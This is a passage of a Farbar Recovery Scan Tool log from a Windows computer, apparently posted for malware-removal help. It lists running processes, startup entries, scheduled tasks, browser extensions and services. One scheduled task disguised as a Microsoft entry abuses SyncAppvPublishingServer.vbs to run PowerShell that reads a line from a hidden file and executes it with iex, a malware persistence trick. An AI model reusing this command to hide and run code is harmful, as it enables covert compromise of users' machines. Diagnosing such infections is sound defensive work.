(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefender AgentProductAgentService.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefender Agentredlinebdredline.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe <3>
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securityupdatesrv.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender VPNBdVpnService.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesCommon FilesBitdefenderSetupInformationBitdefender RedLinebdredline.exe
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureFreedomeFreedome1.1fsvpnservice.exe
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEfshoster32.exe <3>
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fshoster64.exe <2>
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsorsp64.exe
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsulprothoster.exe
(services.exe ->) (Malwarebytes Inc -> Malwarebytes) C:Program FilesMalwarebytesAnti-MalwareMBAMService.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:Program FilesCommon Filesmicrosoft sharedClickToRunOfficeClickToRun.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:WindowsSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_4d7400884d0d52e3Display.NvContainerNVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:WindowsSystem32DriverStoreFileRepositoryrealtekservice.inf_amd64_eb52bf0d4dccfcf3RtkAudUService64.exe <2>
(services.exe ->) (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) C:Program Files (x86)SamsungSamsung MagicianSamsungMagicianSVC.exe
(Slack Technologies, Inc. -> Slack Technologies Inc.) C:UsersPhenomAppDataLocalslackapp-4.26.0slack.exe <5>
(svchost.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGABYTE Technology Co.,Ltd.) C:Program Files (x86)GIGABYTEAORUS ENGINEAORUS.exe
(svchost.exe ->) (HP Inc. -> HP Inc.) C:Program FilesHPSystemOptimizerSystemOptimizer.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:WindowsImmersiveControlPanelSystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:WindowsSystem32dllhost.exe <3>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:WindowsUUSamd64MoUsoCoreWorker.exe
(svchost.exe ->) (Microsoft Windows) C:Program FilesWindowsAppsMicrosoftWindows.Client.WebExperience_421.20070.95.0_x64__cw5n1h2txyewyDashboardWidgets.exe
(svchost.exe ->) (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) C:Program Files (x86)SamsungSamsung MagicianSamsungMagician.exe <4>
(svchost.exe ->) (WhatsApp Inc.) C:Program FilesWindowsApps5319275A.51895FA4EA97F_2.2216.4.0_x64__cv1g1gvanyjgmWhatsApp.exe
(Telegram Messenger LLP) C:Program FilesWindowsAppsTelegramMessengerLLP.TelegramDesktop_3.6.0.0_x64__t4vj0pshhgkwmTelegram.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM...Run: [RtkAudUService] => C:WINDOWSSystem32DriverStoreFileRepositoryrealtekservice.inf_amd64_eb52bf0d4dccfcf3RtkAudUService64.exe [3479488 2022-04-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [EpicGamesLauncher] => C:Program Files (x86)Epic GamesLauncherPortalBinariesWin64EpicGamesLauncher.exe [32613856 2022-04-28] (Epic Games Inc. -> Epic Games, Inc.)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [CCleaner Smart Cleaning] => C:Program FilesCCleanerCCleaner64.exe [36705520 2022-04-07] (Piriform Software Ltd -> Piriform Software Ltd)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [DiscordCanary] => C:UsersPhenomAppDataLocalDiscordCanaryUpdate.exe [1522176 2022-04-15] (Discord Inc. -> GitHub)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [Battle.net] => C:Program Files (x86)Battle.netBattle.net.exe [1088456 2022-04-27] (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [com.squirrel.slack.slack] => C:UsersPhenomAppDataLocalslackslack.exe [309056 2022-04-28] (Slack Technologies, Inc. -> Slack Technologies Inc.)
HKLMSoftwareMicrosoftActive SetupInstalled Components: [{8237E44A-0054-442C-B6B6-EA0509993955}] -> C:Program FilesGoogleChrome BetaApplication101.0.4951.41Installerchrmstp.exe [2022-04-20] (Google LLC -> Google LLC)
HKLMSoftwareMicrosoftActive SetupInstalled Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:Program FilesBraveSoftwareBrave-BrowserApplication101.1.38.109Installerchrmstp.exe [2022-04-27] (Brave Software, Inc. -> Brave Software, Inc.)
Startup: C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupAORUS ENGINE.lnk [2022-04-15]
ShortcutTarget: AORUS ENGINE.lnk -> C:Program Files (x86)GIGABYTEAORUS ENGINEautorun.exe () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:ProgramDataNTUSER.pol: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {02121D01-DBE4-4731-9DFF-FB8E80386CF1} - System32TasksBraveSoftwareUpdateTaskMachineCore => C:Program Files (x86)BraveSoftwareUpdateBraveUpdate.exe [165120 2022-04-11] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {02D88619-C1AF-4364-BD46-DB97F47F0577} - System32TasksF-SecureF-Secure Hotfix => C:Program Files (x86)F-SecureSAFEfs_hotfix.exe [315032 2022-03-25] (F-Secure Corporation -> F-Secure Corporation)
Task: {0489B081-0CCD-44EB-AF65-ECB241F60E93} - System32TasksGoogleUpdateTaskMachineUA => C:Program Files (x86)GoogleUpdateGoogleUpdate.exe [156232 2022-01-19] (Google LLC -> Google LLC)
Task: {144401BC-4F00-4243-ADDC-23C0991D77EB} - System32TasksNvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:Program FilesNVIDIA CorporationNvDriverUpdateCheck" -l 3 -f C:ProgramDataNVIDIANvContainerDriverUpdateCheck.log
Task: {18FA359C-512D-4264-BBC4-9716B96EBB68} - System32TasksGoogleUpdateTaskMachineCore => C:Program Files (x86)GoogleUpdateGoogleUpdate.exe [156232 2022-01-19] (Google LLC -> Google LLC)
Task: {1E9485AB-1FC8-4BF5-BD10-22D73C225910} - System32TasksNVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNVIDIA GeForce ExperienceNVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {316E7299-D946-42B5-B73D-B3CE78777AB9} - System32TasksMicrosoftOfficeOffice Automatic Updates 2.0 => C:Program FilesCommon FilesMicrosoft SharedClickToRunOfficeC2RClient.exe [21863344 2022-02-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {33F7899E-577F-41F4-B864-D0141C9D8AB2} - System32TasksNvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationUpdate CoreNvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {42212260-AAC6-4D5C-837A-A35AAF48EEAC} - System32TasksOneDrive Standalone Update Task-S-1-5-21-1599435516-3482468045-2126034812-1002 => C:UsersPhenomAppDataLocalMicrosoftOneDriveOneDriveStandaloneUpdater.exe (No File)
Task: {4F483515-29B7-41B1-BF87-A0721EE17B31} - System32TasksBraveSoftwareUpdateTaskMachineUA => C:Program Files (x86)BraveSoftwareUpdateBraveUpdate.exe [165120 2022-04-11] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {571D52C1-5426-462D-832E-CAE81C4BD13F} - System32TasksMicrosoftWindowsWHServiceProviderAccess => C:WindowsSystem32SyncAppvPublishingServer.vbs [1720 2021-06-05] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:Windowsrundll62" | Select -Index 17033;iex $a;hackbacktrack 5+SxcONPw31YD5KkNSFEldTrLB+ZFx7b29V1rxazM+g=
Task: {5C6840F8-D23B-420B-BB78-9E7C6677F63D} - System32TasksMicrosoftOfficeOfficeTelemetryAgentFallBack2016 => C:Program FilesMicrosoft OfficerootOffice16msoia.exe [7053720 2022-04-11] (Microsoft Corporation -> Microsoft Corporation)
Task: {5EF50543-85B4-4C16-B500-2BE109B09A59} - System32TasksNvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {5FD84DD5-34F7-4C4E-8C31-8AA688608220} - System32TasksMicrosoftOfficeOffice Feature Updates Logon => C:Program FilesMicrosoft OfficerootOffice16sdxhelper.exe [141208 2022-04-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {657CCEF6-B925-4BB8-8BC5-4BD98753C3D3} - System32TasksMicrosoftOfficeOfficeTelemetryAgentLogOn2016 => C:Program FilesMicrosoft OfficerootOffice16msoia.exe [7053720 2022-04-11] (Microsoft Corporation -> Microsoft Corporation)
Task: {7E0D34DA-C99B-4ED8-AD65-78C683E4E6F4} - System32TasksMicrosoftOfficeOffice ClickToRun Service Monitor => C:Program FilesCommon FilesMicrosoft SharedClickToRunOfficeC2RClient.exe [21863344 2022-02-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {806500B0-429A-44D7-B112-B896FB0DF002} - System32TasksNvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {876E2C86-4C1A-4362-807C-D8A9093BA089} - System32TasksSamsungMagician => C:Program Files (x86)SamsungSamsung MagicianSamsungMagician.exe [109697976 2021-12-09] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
Task: {8EE53488-CE10-4468-BF82-04DD04A80832} - System32TasksSystemOptimizer => C:Program FilesHPSystemOptimizerSystemOptimizer.exe [112728 2022-02-03] (HP Inc. -> HP Inc.)
Task: {971D583E-B335-4C31-8215-203FD48CCF28} - System32TasksNvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {9B890657-6594-4E7A-8A56-1764675F9614} - System32TasksNvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program Files (x86)NVIDIA CorporationNvNodenvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {9C800561-F322-402A-9F8A-D24092BE4DC6} - System32TasksOpera scheduled Autoupdate 1642631694 => C:UsersPhenomAppDataLocalProgramsOpera developerlauncher.exe [2719488 2022-04-25] (Opera Software AS -> Opera Software) <==== ATTENTION
Task: {A8AACED6-3881-4225-B3A7-C59CC48C1B8D} - System32TasksCreateExplorerShellUnelevatedTask => C:Windowsexplorer.exe /NoUACCheck
Task: {AD351213-BD13-4623-8D52-334B6653287E} - System32TasksNvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationUpdate CoreNvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {AF0A8389-6BE8-48E7-B5A6-2264F05C791D} - System32TasksNvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B1C0202D-0735-40AA-BA43-65446D23A0E5} - System32TasksKpRm-quarantinesKpRm-quarantines-20220428182110 => C:KPRMtasks-quarantineskprm-quarantines.exe [2811112 2022-04-28] (kernel-panik -> kernel-panik) [File not signed]
Task: {B6CD9DD5-733E-4913-B41E-BE05EB7EE694} - System32TasksBitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:Program FilesBitdefenderBitdefender Securitybdagent.exe [584280 2022-04-20] (Bitdefender SRL -> Bitdefender)
Task: {C0CEC1B1-3690-481F-8A9B-493D4E0799D6} - System32TasksOneDrive Standalone Update Task-S-1-5-21-1599435516-3482468045-2126034812-1001 => C:UsersPhenomAppDataLocalMicrosoftOneDriveOneDriveStandaloneUpdater.exe (No File)
Task: {C357FFB5-D09A-4A71-9F1C-DD2F0CD24A14} - System32TasksCCleaner Update => C:Program FilesCCleanerCCUpdate.exe (No File)
Task: {D895215F-D917-49D6-9612-8342A713BEE4} - System32TasksLauncher GIGABYTE AORUS GRAPHICS ENGINE => C:Program Files (x86)GIGABYTEAORUS ENGINEAORUS.exe [34682752 2022-04-06] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGABYTE Technology Co.,Ltd.)
Task: {DEB67D86-1989-4F0D-ACDB-54BBDC527C49} - System32TasksBitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:Program FilesBitdefender Agent26.0.1.220WatchDog.exe [1050728 2022-03-23] (Bitdefender SRL -> Bitdefender)
Task: {E6CDAF43-7A59-4EC1-B8F7-5E627C14235A} - System32TasksOneDrive Reporting Task-S-1-5-21-1599435516-3482468045-2126034812-1002 => C:UsersPhenomAppDataLocalMicrosoftOneDriveOneDriveStandaloneUpdater.exe /reporting (No File)
Task: {F9318572-28D5-44C3-A922-33626CF768E5} - System32TasksMicrosoftOfficeOffice Feature Updates => C:Program FilesMicrosoft OfficerootOffice16sdxhelper.exe [141208 2022-04-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {FCC2E13F-8694-42FB-B00A-7730EEB2751D} - System32TasksCCleanerSkipUAC - Phenom => C:Program FilesCCleanerCCleaner.exe [30836464 2022-04-07] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {FCC85155-47B0-440D-B196-5117B748A8DE} - System32TasksMozillaFirefox Nightly Default Browser Agent 6F193CCC56814779 => C:Program FilesFirefox Nightlydefault-browser-agent.exe do-task "6F193CCC56814779"

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 127.0.0.1 localhost
TcpipParameters: [DhcpNameServer] 192.168.0.1
Tcpip..Interfaces{08f01634-5a0a-4001-b76a-d21b548a3691}: [DhcpNameServer] 192.168.0.1
Tcpip..Interfaces{c9b8105f-65f8-4b25-b26f-34596433fd48}: [DhcpNameServer] 192.168.0.1
Tcpip..Interfaces{cd2d2ece-a2e7-4176-b987-5e8ea18b4918}: [DhcpNameServer] 8.8.8.8
HKLMSOFTWAREPoliciesMicrosoftInternet Explorer: Restriction <==== ATTENTION

Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:UsersPhenomAppDataLocalMicrosoftEdgeUser DataDefault [2022-04-27]
Edge DownloadDir: Default -> C:UsersPhenomDownloads
Edge Notifications: Default -> hxxps://www.tiktok.com
Edge Session Restore: Default -> is enabled.
Edge Extension: (F.B.(FluffBusting)Purity) - C:UsersPhenomAppDataLocalMicrosoftEdgeUser DataDefaultExtensionsbbadpifemeclpdmgelgehgclmeohdoge [2022-04-27]
Edge Extension: (Switch UserAgents) - C:UsersPhenomAppDataLocalMicrosoftEdgeUser DataDefaultExtensionsipacohcfiahhblhbpdnnmnolcakgooci [2022-01-19]
Edge HKLM...EdgeExtension: [cpikpibllpjmpnchjajlibnmmomnnhnm]
Edge HKLM-x32...EdgeExtension: [cpikpibllpjmpnchjajlibnmmomnnhnm]

FireFox:
========
FF DefaultProfile: mkifesbr.default
FF ProfilePath: C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightly [2022-04-28]
FF Session Restore: MozillaFirefoxProfileskuhj0kmw.default-nightly -> is enabled.
FF Extension: (Facebook Container) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions@contain-facebook.xpi [2021-12-30]
FF Extension: (The Stream Detector) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions@m3u8link.xpi [2021-12-30]
FF Extension: (TunnelBear VPN) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsbrowser@tunnelbear.com.xpi [2021-12-30]
FF Extension: (Decentraleyes) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsjid1-BoFifL9Vbdl2zQ@jetpack.xpi [2021-12-30]
FF Extension: (Nimbus Screen Capture: Screenshots, Annotate) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsnimbusscreencaptureff@everhelper.me.xpi [2021-12-30]
FF Extension: (Rotate and Zoom Image) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsrotate-and-zoom-image@mikk.cz.xpi [2021-12-30]
FF Extension: (uBlock Origin) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsuBlock0@raymondhill.net.xpi [2021-12-30]
FF Extension: (User-Agent Switcher) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{75afe46a-7a50-4c6b-b866-c43a1075b071}.xpi [2021-12-30]
FF Extension: (Video Speed Controller) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{7be2ba16-0f1e-4d93-9ebc-5164397477a9}.xpi [2021-12-30]
FF Extension: (Creează un script nou) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{aecec67f-0d10-4fa7-b7c7-609a2db280cf}.xpi [2021-12-30]
FF Extension: (Video DownloadHelper) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2021-12-30]
FF Extension: (Buster: Captcha Solver for Humans) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{e58d3966-3d76-4cd9-8552-1582fbc800c1}.xpi [2021-12-30]
FF ProfilePath: C:UsersPhenomAppDataRoamingMozillaFirefoxProfiles8k2igm37.default-release [2022-04-28]
FF ProfilePath: C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.default [2022-04-28]
FF NetworkProxy: MozillaFirefoxProfilesmkifesbr.default -> type", 0
FF Session Restore: MozillaFirefoxProfilesmkifesbr.default -> is enabled.
FF Notifications: MozillaFirefoxProfilesmkifesbr.default -> hxxps://www.facebook.com; hxxps://www.youtube.com; hxxps://www.instagram.com
FF Extension: (Facebook Container) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions@contain-facebook.xpi [2022-04-02]
FF Extension: (The Stream Detector) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions@m3u8link.xpi [2022-04-02]
FF Extension: (TunnelBear VPN) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsbrowser@tunnelbear.com.xpi [2021-04-03]
FF Extension: (Chrome Store Foxified) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsChrome-Store-Foxified@jetpack.xpi [2018-09-07]
FF Extension: (Nimbus Screen Capture: Screenshots, Annotate) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsnimbusscreencaptureff@everhelper.me.xpi [2020-08-28]
FF Extension: (Rotate and Zoom Image) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsrotate-and-zoom-image@mikk.cz.xpi [2022-04-02]
FF Extension: (uBlock Origin) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsuBlock0@raymondhill.net.xpi [2022-04-06]
FF Extension: (User-Agent Switcher) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{75afe46a-7a50-4c6b-b866-c43a1075b071}.xpi [2021-07-15]
FF Extension: (Video Speed Controller) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{7be2ba16-0f1e-4d93-9ebc-5164397477a9}.xpi [2021-04-22]
FF Extension: (Creează un script nou) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{aecec67f-0d10-4fa7-b7c7-609a2db280cf}.xpi [2021-06-07]
FF Extension: (Video DownloadHelper) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2021-07-08]
FF Extension: (Buster: Captcha Solver for Humans) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{e58d3966-3d76-4cd9-8552-1582fbc800c1}.xpi [2021-11-04]
FF HKLM...FirefoxExtensions: [bdwtwe@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdwteff.xpi
FF Extension: (Bitdefender Wallet) - C:Program FilesBitdefenderBitdefender Securitybdwteff.xpi [2022-04-20] [UpdateUrl:hxxps://download.bitdefender.com/windows/desktop/connect/wallet/updates.json ]
FF HKLM...FirefoxExtensions: [bdtbe@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdtbef.xpi
FF Extension: (Bitdefender Anti-tracker) - C:Program FilesBitdefenderBitdefender Securitybdtbef.xpi [2020-09-17] [UpdateUrl:hxxps://download.bitdefender.com/windows/desktop/connect/antitracker/updates.json ]
FF HKLM...ThunderbirdExtensions: [bdThunderbird@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:Program FilesBitdefenderBitdefender Securitybdtbext [2022-04-20] [Legacy] [not signed]
FF HKLM-x32...FirefoxExtensions: [bdwtwe@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdwteff.xpi
FF HKLM-x32...FirefoxExtensions: [bdtbe@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdtbef.xpi
FF HKLM-x32...ThunderbirdExtensions: [bdThunderbird@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdtbext
FF Plugin: @java.com/DTPlugin,version=11.321.2 -> C:Program FilesJavajre1.8.0_321bindtpluginnpDeployJava1.dll [2022-02-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.321.2 -> C:Program FilesJavajre1.8.0_321binplugin2npjp2.dll [2022-02-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:Program FilesMicrosoft OfficerootOffice16NPSPWRAP.DLL [2022-04-11] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.16 -> C:Program FilesVideoLANVLCnpvlc.dll [2022-04-20] (VideoLAN) [File not signed]
FF Plugin: @videolan.org/vlc,version=3.0.17.3 -> C:Program FilesVideoLANVLCnpvlc.dll [2022-04-20] (VideoLAN) [File not signed]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:Program FilesMicrosoft OfficerootVFSProgramFilesX86Microsoft OfficeOffice16NPSPWRAP.DLL [2022-04-11] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:UsersPhenomAppDataRoamingmozillapluginsnplightsparkplugin.dll [2022-01-19]
StartMenuInternet: Firefox-6F193CCC56814779 - C:Program FilesFirefox Nightlyfirefox.exe

Chrome:
=======
CHR HKLM...ChromeExtension: [jmjjnhpacphpjmnnlnccpfmhkcloaade]
CHR HKLM-x32...ChromeExtension: [gannpgaobkkhmpomoijebaigcapoeebl]
CHR HKLM-x32...ChromeExtension: [jmjjnhpacphpjmnnlnccpfmhkcloaade]
CHR HKLM-x32...ChromeExtension: [khndhdhbebhaddchcgnalcjlaekbbeof]
StartMenuInternet: Google Chrome Beta - C:Program FilesGoogleChrome BetaApplicationchrome.exe

Opera:
=======
StartMenuInternet: (HKUS-1-5-21-1599435516-3482468045-2126034812-1001) Operadeveloper - "C:UsersPhenomAppDataLocalProgramsOpera developerLauncher.exe"

Brave:
=======
BRA Profile: C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser DataDefault [2022-04-19]
BRA Extension: (Brave Local Data Files Updater) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Dataafalakplffnnnlkncjhbmahjfjhmlkal [2022-04-13]
BRA Extension: (Brave NTP background images) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Dataaoojcmojmmcbpfgoecoadbdpnagfchel [2022-04-11]
BRA Extension: (Wallet Data Files Updater) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser DataBraveWallet [2022-04-13]
BRA Extension: (Brave Ad Block Updater (Default)) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Datacffkpbalmllkdoenhmdmpbkajipdjfam [2022-04-13]
BRA Extension: (Brave SpeedReader Updater) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Datajicbkmdloagakknpihibphagfckhjdih [2022-04-11]
BRA Extension: (Brave NTP sponsored images) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Datalpebdnochobhopeiidkonjhkepamihmm [2022-04-13]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Dataoofiananboodjbbmdelgdommihjbkfag [2022-04-13]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AfVpnService; C:Program FilesBitdefenderBitdefender VPNhydra.sdk.windows.service.exe [198256 2021-01-26] (Pango Inc. -> AnchorFree Inc.)
S4 AGSService; C:Program Files (x86)Common FilesAdobeAdobeGCClientAGSService.exe [3103824 2021-02-01] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AviraPhantomVPN; C:Program Files (x86)AviraVPNAvira.VpnService.exe [338432 2022-04-22] (Avira Operations GmbH & Co. KG) [File not signed]
R2 BDAuxSrv; C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe [822240 2022-04-20] (Bitdefender SRL -> Bitdefender)
R2 BDProtSrv; C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe [822240 2022-04-20] (Bitdefender SRL -> Bitdefender)
R2 bdredline; C:Program FilesCommon FilesBitdefenderSetupInformationBitdefender RedLinebdredline.exe [2195344 2018-03-22] (Bitdefender SRL -> Bitdefender)
R2 bdredline_agent; C:Program FilesBitdefender Agentredlinebdredline.exe [2454632 2022-02-10] (Bitdefender SRL -> Bitdefender)
R2 BdVpnService; C:Program FilesBitdefenderBitdefender VPNbdvpnservice.exe [263328 2022-03-30] (Bitdefender SRL -> Bitdefender)
S2 brave; C:Program Files (x86)BraveSoftwareUpdateBraveUpdate.exe [165120 2022-04-11] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 bravem; C:Program Files (x86)BraveSoftwareUpdateBraveUpdate.exe [165120 2022-04-11] (Brave Software, Inc. -> BraveSoftware Inc.)
R2 ClickToRunSvc; C:Program FilesCommon FilesMicrosoft SharedClickToRunOfficeClickToRun.exe [9191816 2022-02-24] (Microsoft Corporation -> Microsoft Corporation)
S3 EpicOnlineServices; C:Program Files (x86)Epic GamesEpic Online ServicesserviceEpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Games Inc. -> Epic Games, Inc.)
R2 Freedome Service; C:Program Files (x86)F-SecureFreedomeFreedome1.1fsvpnservice.exe [1649864 2022-04-27] (F-Secure Corporation -> F-Secure Corporation)
R2 fshoster; C:Program Files (x86)F-SecureSAFEfshoster32.exe [239256 2022-03-25] (F-Secure Corporation -> F-Secure Corporation)
R2 fsnethoster; C:Program Files (x86)F-SecureSAFEfshoster32.exe [239256 2022-03-25] (F-Secure Corporation -> F-Secure Corporation)
R2 fsulhoster; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fshoster64.exe [417048 2022-04-28] (F-Secure Corporation -> F-Secure Corporation)
